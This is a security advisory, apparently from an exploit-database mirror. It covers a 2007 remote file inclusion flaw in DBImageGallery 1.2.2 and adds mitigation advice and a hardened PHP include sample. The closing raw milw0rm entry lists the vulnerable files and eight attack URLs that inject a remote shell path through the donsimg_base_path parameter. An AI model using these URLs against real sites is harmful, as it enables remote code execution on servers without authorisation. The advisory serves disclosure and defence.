Vendor: DBImageGallery
By: Denven
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion (RFI)
Product Name: DBImageGallery
Affected Version From: DBImageGallery 1.2.2
Affected Version To: DBImageGallery 1.2.2
Patch Exists: NO
Related CWE: None provided
Year: 2007

DBImageGallery 1.2.2 RFI Vulnerability

The DBImageGallery 1.2.2 script is vulnerable to remote file inclusion (RFI). The affected PHP files pass the 'donsimg_base_path' variable straight to require_once, so if an attacker can control that value (for example through a request parameter) they can make the application include and execute an arbitrary remote file, which typically leads to remote code execution.

Mitigation:

To mitigate this vulnerability, update to a patched version of the software if one becomes available. Additionally, ensure that include and require paths are never built from user-controlled input, and that any input used in file inclusion operations is strictly validated against an allowlist before use.
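The following PHP is an added illustration, not DBImageGallery's own code: it shows the include pattern the advisory describes next to a hardened equivalent. The file names, the allowlist entries and the directory layout are assumptions made for the example.

```php
<?php
// Hypothetical layout: this file lives in admin/, shared code in ../includes/.

// --- Vulnerable pattern (as described in the advisory) ---
// With register_globals enabled, a request parameter becomes the global
// $donsimg_base_path; with allow_url_include enabled, require_once will then
// fetch and execute whatever URL the request supplied.
//
//     require_once $donsimg_base_path . 'includes/utils.php';

// --- Hardened equivalent ---
// 1. The base path is fixed at deploy time, derived from the script's own
//    location, never from request data.
define('DONSIMG_BASE_PATH', dirname(__DIR__) . DIRECTORY_SEPARATOR);

// 2. Explicitly drop any request-supplied copy of the old variable so a
//    register_globals leftover cannot reach an include statement.
unset($donsimg_base_path, $_GET['donsimg_base_path'], $_POST['donsimg_base_path']);

// 3. When an include name must come from input, map it through an allowlist
//    and confirm the resolved path is still inside the base directory.
function donsimg_safe_include(string $name): string
{
    $allowed = ['attributes', 'db_utils', 'images', 'utils', 'values'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException('include not in allowlist: ' . $name);
    }
    $base = realpath(DONSIMG_BASE_PATH);
    $path = realpath(DONSIMG_BASE_PATH . 'includes' . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include resolves outside base path');
    }
    return $path;
}

require_once donsimg_safe_include('utils');
```

Server-side hardening belongs alongside the code fix: with allow_url_include=Off (and register_globals=Off) in php.ini, the request parameter can no longer become a remote include even if a vulnerable file remains.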

Exploit-DB raw data:

DBImageGallery 1.2.2
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=1
*****************
ERROR:
 
admin/attributes.php                      require_once $donsimg_base_path
admin/images.php                          require_once $donsimg_base_path
admin/scan.php                            require_once $donsimg_base_path
includes/attributes.php                   require_once $donsimg_base_path
includes/db_utils.php                     require_once $donsimg_base_path
includes/images.php                       require_once $donsimg_base_path
includes/utils.php                        require_once $donsimg_base_path
includes/values.php                       require_once $donsimg_base_path
**************************************************************************************
RFI:
 
http://SITE.com/path/admin/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/admin/scan.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/attributes.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/db_utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/images.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/utils.php?donsimg_base_path=[SHELL]
http://SITE.com/path/includes/values.php?donsimg_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]